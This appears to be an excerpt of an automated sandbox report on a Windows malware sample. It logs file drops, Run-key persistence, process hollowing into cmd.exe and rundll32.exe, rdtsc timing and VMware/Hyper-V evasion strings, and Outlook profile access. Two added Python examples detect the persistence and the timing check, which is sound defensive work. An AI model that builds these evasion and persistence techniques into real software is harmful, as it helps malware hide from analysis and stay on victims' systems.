Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035B8007 push sp; iretd 0_3_035B8009
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF45C pushad ; retf 0_3_035CF460
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF45C pushad ; retf 0_3_035CF460
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf 0_3_035D005A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf 0_3_035D005A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf 0_3_035D005A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf 0_3_035D0458
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf 0_3_035D0458
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf 0_3_035D0458
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF145 pushfd ; retf 0_3_035CF147
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF145 pushfd ; retf 0_3_035CF147
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF37A pushad ; retf 0_3_035CF37B
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF37A pushad ; retf 0_3_035CF37B
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF416 pushad ; retf 0_3_035CF417
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF416 pushad ; retf 0_3_035CF417
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf 0_3_035D0029
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf 0_3_035D0029
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf 0_3_035D0029
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF707 pushad ; retf 0_3_035CF73A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF707 pushad ; retf 0_3_035CF73A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CFFDD pushad ; retf 0_3_035D0011
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CFFDD pushad ; retf 0_3_035D0011
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF8D7 push esp; ret 0_3_035CF90C
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF8D7 push esp; ret 0_3_035CF90C
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D06C5 push ecx; retf 0_3_035D06D5
Source: IconCachet0hh.exe.7.dr Static PE information: section name: .didat
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe Jump to dropped file
Source: C:\Users\user\Desktop\TR0627729920002.exe File created: C:\Users\Public\Libraries\Jwjxmakrv.exe Jump to dropped file

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
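The two Run values above (Jwjxmakrv, written by the sample itself, and 5JJ89HI, written by the hollowed rundll32.exe), together with the cmd.pdb string the report found inside IconCachet0hh.exe, give the persistence picture: an autostart pointing at a drop in a user-writable directory, and an autostart pointing at a renamed copy of cmd.exe. As an added example that is not part of the report, the Python below triages a .reg export of the HKCU Run key: it flags targets in user-writable locations and targets whose embedded PDB name belongs to a Windows binary other than the file itself. The export text, the OneDrive entry, the target path for 5JJ89HI and the file contents are constructed assumptions (the report names the 5JJ89HI value but not its data).

```python
"""Run-key persistence triage for the autostart values seen above.

Added example, not part of the Joe Sandbox report. REG_EXPORT is a
constructed "reg export" of the HKCU Run key: the value names Jwjxmakrv
and 5JJ89HI come from the report; the 5JJ89HI target and the OneDrive
entry are assumptions. FILE_BYTES stands in for reading the target files
(the RSDS record with "cmd.pdb" mirrors the cmd.pdb string the report
found in IconCachet0hh.exe).
"""
import ntpath
import re
import struct

REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Jwjxmakrv"="C:\\Users\\Public\\Libraries\\Jwjxmakrv.exe"
"5JJ89HI"="C:\\Program Files (x86)\\P1bxx\\IconCachet0hh.exe"
'''


def _rsds(pdb):
    # CodeView RSDS debug record: signature, 16-byte GUID, age, NUL-terminated PDB path.
    return b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + pdb + b"\x00"


# Constructed stand-ins for the on-disk files (a real triage would open them).
FILE_BYTES = {
    r"c:\users\public\libraries\jwjxmakrv.exe": b"MZ" + b"\x00" * 200,
    r"c:\program files (x86)\p1bxx\iconcachet0hh.exe":
        b"MZ" + b"\x00" * 200 + _rsds(b"cmd.pdb") + b"\x00" * 32,
}

# Windows binaries whose PDB names turn up inside "renamed" copies of them.
SYSTEM_PDB_STEMS = {"cmd", "rundll32", "regsvr32", "mshta", "wscript", "cscript",
                    "powershell", "msiexec", "explorer", "svchost", "conhost"}
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\programdata\\")

# Absolute (drive-letter) or bare PDB paths, NUL-terminated as in an RSDS record.
PDB_RE = re.compile(rb"(?:[A-Za-z]:\\[^\x00]{1,240}?|[\w.\-]{1,64})\.pdb\x00", re.I)


def _unescape(s):
    # .reg files escape backslashes and quotes inside REG_SZ data.
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_run_values(reg_text):
    """Return [(value_name, data)] for the REG_SZ lines of a .reg export."""
    vals = []
    for line in reg_text.splitlines():
        m = re.match(r'^"((?:[^"\\]|\\.)+)"="((?:[^"\\]|\\.)*)"$', line.strip())
        if m:
            vals.append((_unescape(m.group(1)), _unescape(m.group(2))))
    return vals


def target_exe(command):
    """Executable path from a Run value's command line (quoted or bare)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    m = re.match(r"(.+?\.exe)(?:\s|$)", command, re.I)
    return m.group(1) if m else command.split()[0]


def pdb_stems(data):
    """Lower-cased PDB basenames (without .pdb) embedded in a PE image."""
    names = set()
    for m in PDB_RE.finditer(data):
        path = m.group(0)[:-1].decode("latin-1")
        names.add(ntpath.basename(path)[:-4].lower())
    return names


def triage_run_values(reg_text, file_bytes):
    """[(value_name, exe_path, [flags])] for every Run value in the export."""
    rows = []
    for name, data in parse_run_values(reg_text):
        exe = target_exe(data)
        low = exe.lower()
        flags = []
        if any(d in low for d in USER_WRITABLE):
            flags.append("user_writable_location")
        stem = ntpath.basename(low)[:-4] if low.endswith(".exe") else ntpath.basename(low)
        for pdb in pdb_stems(file_bytes.get(low, b"")):
            if pdb != stem and pdb in SYSTEM_PDB_STEMS:
                flags.append(f"renamed_windows_binary:{pdb}")
        rows.append((name, exe, flags))
    return rows


if __name__ == "__main__":
    for name, exe, flags in triage_run_values(REG_EXPORT, FILE_BYTES):
        print(f"{name:12} {exe:55} {', '.join(flags) or '-'}")
```

The PDB check is the cheap way to catch "Drops or copies cmd.exe with a different name": a renamed system binary still carries its original cmd.pdb (or rundll32.pdb, ...) debug path, which is exactly the string the report pulled from IconCachet0hh.exe. Checking the Authenticode signer and the original file name in the version resource would be the next two checks in a real triage.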

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000050418C04 second address: 0000000050418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000050418F9E second address: 0000000050418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000948C04 second address: 0000000000948C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000948F9E second address: 0000000000948FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
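The four interceptor hits above are one 8-byte sequence seen at two sites in each hollowed process: rdtsc, xor ecx,ecx, add ecx,eax, rdtsc. The three 2-byte instructions put the second rdtsc 6 bytes after the first, which is why the addresses run C04 to C0A and F9E to FA4. The low 32 bits of the first timestamp are parked in ecx so that the code after the second rdtsc can take the difference; the report does not show that comparison, but a large delta between two back-to-back rdtsc is the usual tell for a hypervisor that traps or slows the instruction. As an added example that is not part of the report, the Python below finds that sequence (both opcode encodings of the xor and add) in a memory dump and prints hits in the report's wording; the dump bytes are constructed and the base address is an assumption chosen so the first hit lands on the report's 0x50418C04.

```python
"""Scanner for the rdtsc-pair timing check intercepted in cmd.exe/rundll32.exe.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed
byte blob standing in for a process-memory dump; SAMPLE_BASE is an assumed
load address picked so the first hit matches the report's 0x50418C04.
"""
import re

# rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc
# Lengths 2+2+2 place the second rdtsc 6 bytes after the first, matching the
# report's "First address ...C04 / second address ...C0A". Both encodings of
# xor (31 C9 / 33 C9) and add (01 C1 / 03 C8) are accepted.
RDTSC_PAIR = re.compile(
    rb"\x0f\x31"                # rdtsc          -> edx:eax = TSC
    rb"(?:\x31\xc9|\x33\xc9)"   # xor ecx, ecx
    rb"(?:\x01\xc1|\x03\xc8)"   # add ecx, eax   -> ecx = low 32 bits of TSC #1
    rb"\x0f\x31"                # rdtsc          -> eax - ecx is the elapsed delta
)

# Constructed dump: one hit in the report's encoding, one in the alternate
# encoding, and one lone rdtsc that must not be reported.
SAMPLE = (b"\x90" * 4
          + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"
          + b"\x90" * 8
          + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"
          + b"\xcc" * 4
          + b"\x0f\x31"
          + b"\x90" * 40)
SAMPLE_BASE = 0x50418C00  # assumed; not taken from the report


def find_rdtsc_pairs(data, base=0):
    """Return [(first_rdtsc_va, second_rdtsc_va)] for every match in data."""
    return [(base + m.start(), base + m.start() + 6) for m in RDTSC_PAIR.finditer(data)]


def report(data, base=0):
    """Render hits in the sandbox report's own wording."""
    return [f"RDTSC instruction interceptor: First address: {a:016X} second address: {b:016X}"
            for a, b in find_rdtsc_pairs(data, base)]


if __name__ == "__main__":
    for line in report(SAMPLE, SAMPLE_BASE):
        print(line)
```

Run it over the unpacked region of the hollowed process (the report's hits sit in cmd.exe at 0x50418xxx and in rundll32.exe at 0x00948xxx, the same code at two load addresses), not over the file on disk: the sequence only exists after the injected payload has been unpacked. A lone rdtsc is too common in legitimate code to flag on its own, which is why the scanner requires the full pair.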
Source: C:\Windows\explorer.exe TID: 5744 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E rdtsc 0_3_035D083E
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 5.0 %
Source: C:\Users\user\Desktop\TR0627729920002.exe Process information queried: ProcessInformation Jump to behavior
Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000007.00000000.318850727.0000000008290000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.374000446.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000007.00000000.281739270.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.360032038.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000007.00000000.355070759.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E rdtsc 0_3_035D083E
Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h] 5_2_03C553CA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h] 5_2_03C553CA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
